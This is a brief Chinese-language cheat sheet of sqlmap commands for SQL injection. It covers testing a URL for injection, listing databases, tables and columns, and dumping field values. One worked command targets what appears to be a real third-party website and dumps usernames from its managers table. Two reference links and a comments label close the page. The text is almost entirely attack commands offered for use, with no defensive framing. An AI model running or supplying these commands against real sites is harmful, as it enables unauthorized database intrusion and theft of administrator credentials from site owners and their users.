sqlmap.py -u url 验证是否为注入点
sqlmap.py -u url --dbs 列出数据库系统的数据库
sqlmap.py -u url --tables -D db_name 列举数据库表
sqlmap.py -u url --columns -T table_name -D db_name 列举数据库表中的字段
sqlmap.py -u url --dump -C columns_name -T tables_name -D db_name 列举出字段值
./sqlmap.py -u "http://www.calin.com.tw/ab.php?id=1&item_id=3" --dump -C username --columns -T managers_tw -D dbcalin
https://zhuanlan.zhihu.com/p/36336483
https://www.cnblogs.com/anka9080/p/sqlmap.html
网友评论